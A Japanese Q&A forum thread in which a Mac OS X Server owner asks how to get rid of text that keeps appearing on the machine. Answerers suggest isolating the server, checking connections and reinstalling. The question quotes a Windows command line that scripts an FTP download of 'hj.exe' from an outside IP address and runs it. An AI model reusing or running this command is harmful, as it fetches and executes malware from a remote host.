- 締切済み
Mac OS X Serverのウィルスの質問です。
macのウィルスについての質問です。 定期的に下記のようなのが自動的に打たれます。これはテキストに書かれたものです。 環境はMac OS X Server Ver 10.5.8 プロセッサ 1.83GHz Intel Core 2Duoです。 5systemroot5\system32\cmd.exe cmd /c echo open 143.90.172.46 57864 .. ik 7echo user t g .. ik 7echo get hj.exe .. ik 7echo bye .. ik 7ftp -n -v -s;ik 7del ik 7hj.exe 7exit この中で、143.90.172.46 57864の最後の5桁の数字はいろいろ変わります。 これをどうにか排除する方法を教えてください。 よろしくお願いします。
- bonborilaa
- お礼率80% (4/5)
- ネットワーク
- 回答数5
- ありがとう数5
- みんなの回答 (5)
- 専門家の回答
みんなの回答
- o_tooru
- ベストアンサー率37% (915/2412)
恐縮ながら ほかにはどういったコネクションを、どこのアドレスと張っていたりします? ほかに、不明なプロセスとかは走っていますか? DNSサーバとのこと、WebサーバやFTPなどと違い、結構止められない機能ですよね? 私も、Webサーバ自前で立ち上げていますが、DNSはそこいらへんが面倒なので 立ち上げるのを躊躇しています。 うまくいくといいですね
- o_tooru
- ベストアンサー率37% (915/2412)
おはようございます、おこまりですね。 さてご質問の件ですが、お使いのサーバですが、公開サーバなのですかね? それとも内部だけに公開されたイントラネット内のサーバなのですかね? いずれにしても、不安であれば、きちんとした専門家に支援を頼む内容かもしれません。 Macは全くの素人の私ですが、FreeBSDは少しいじったことがあります。こういった場合は、Macも同じでターミナルから、プロセスを取ったり、どこにコネクションを張っているのか、あたりを確認していくのがセオリーかと思います。 ただ、公開サーバで、まじめに入り込まれていて、tootkitあたりを仕込まれていると、プロセスやコネクションを隠されてしまいますので、発見は困難になると聞きます。
- osamuy
- ベストアンサー率42% (1231/2878)
>表記のような文字が3~5分間隔で打たれる現象です。 ってことは、不正なプログラムが勝手に実行、しかも今もなお動作してるってことだから結構深刻かと。 まずは当該システムをネットワークから隔離したほうが良いのでは。 その上で、証拠保全のためにシステム・ダンプを取得したり、面倒ならクリアインストールするとか。 ただ、単にクリアするだけだと、またやられるかもしれないので、深く追求してみたほうが良いとも考えます。auditを有効にするとか、ファイアウォールのログをとるとか。 まあここで質問されてるぐらいだから、そんなに力を入れなくても良いサーバだったりするのかもしれませんが。
お礼
結構深刻なのが確認されました。 再インストールすることにしました。 ありがとうございました。
補足
ありがとうございます。 実は半年前からおかしいと思っていましたが、ちゃんと調べたら質問のような現象でした。 もうちょっとがんばってみます。。
- cliomaxi
- ベストアンサー率33% (2921/8736)
接続環境はどのようになっていますか? Serverに接続しているマシンはMacだけでしょうか、WindowsやLinux混在でしょうか? また、接続しているマシンのOSのそれぞれのバージョンは何でしょうか? TextEditでカーソルを云々の部分ですが、もし複数のMacを接続しているのなら全て同じ症状が現れますか? 以前務めていた会社でバージョンは違いますが、OSXServer10.4.11と十数台のMac(OSX10.4.11と10.3.9、PPCMacとIntelMac混在)を接続していて全てのMacが激重になった事があります。 Server内のファイルを検索しても数十秒もかかるとか(正常時は瞬時)、アプリケーションの動作そのものも接続解除した時に比べ体感するほど遅くなりました。 ファイル名も書き換えられると言うよりは文字化けのような症状でした。 原因を調べると、ServerでもMacでも無くルーターの不具合でした。 交換すると嘘のように直りました。 この会社はMacと言う事もありセキュリティには無頓着で(愚痴になりますが管理していた私が最低限とも言えるセキュリティ設定をしたところ社員から面倒くさいとブーイングが出るほどでした。)ほぼ無防備な状態にも関わらずウィルス感染は一度もありません。(Macの実用的なウィルス自体もまだ普及していません。=個人の感想です。効果を保障するものではありません。)
お礼
ありがとうございました。 結局いろいろ調べたら、ちゃんと排除しようと思うと数十万かかるので再インストールを選択しました。
補足
接続しているマシンはmac winで、macはOSXで、winはXP,VISTの混在で、この症状が出ているのはserverだけです。 現在、ClamXavとウィルスバスターで検索中です。 やっぱ再インストールでしょうか。。。涙。。
- osamuy
- ベストアンサー率42% (1231/2878)
何に対して「打たれて」るのかとか、どこに書かれた「テキスト」なのかを、具体的に説明したほうが回答が得られやすいかと。 外部からのアクセスによるものか、内部のプロセスによるものなのかで対処方法が変わるでしょうから。 見た感じWindows向けっぽいですが。
お礼
ありがとうございました。 いろいろ試しましたが、結局は再インストールの選択になりました。
補足
なんか調子が悪く、勝手にファイル名がめちゃくちゃになったりして、マックのテキストエディッタ上にカーソルをもっていったら、表記のような文字が3~5分間隔で打たれる現象です。
お礼
ありがとうございました。 結局、発見は困難なことがわかりましたので、 再インストールすることにしました。 いろいろすみませんでした。
補足
DNSサーバーとして公開しています。ちなみに143.90.172.46でネットに接続すると、中国語でエラーのページが開きます。 発見が困難ということは、やはり再インストールでしょうか? 最初からserverを設定しなおすとなるとめんどいですがあきらめますか。。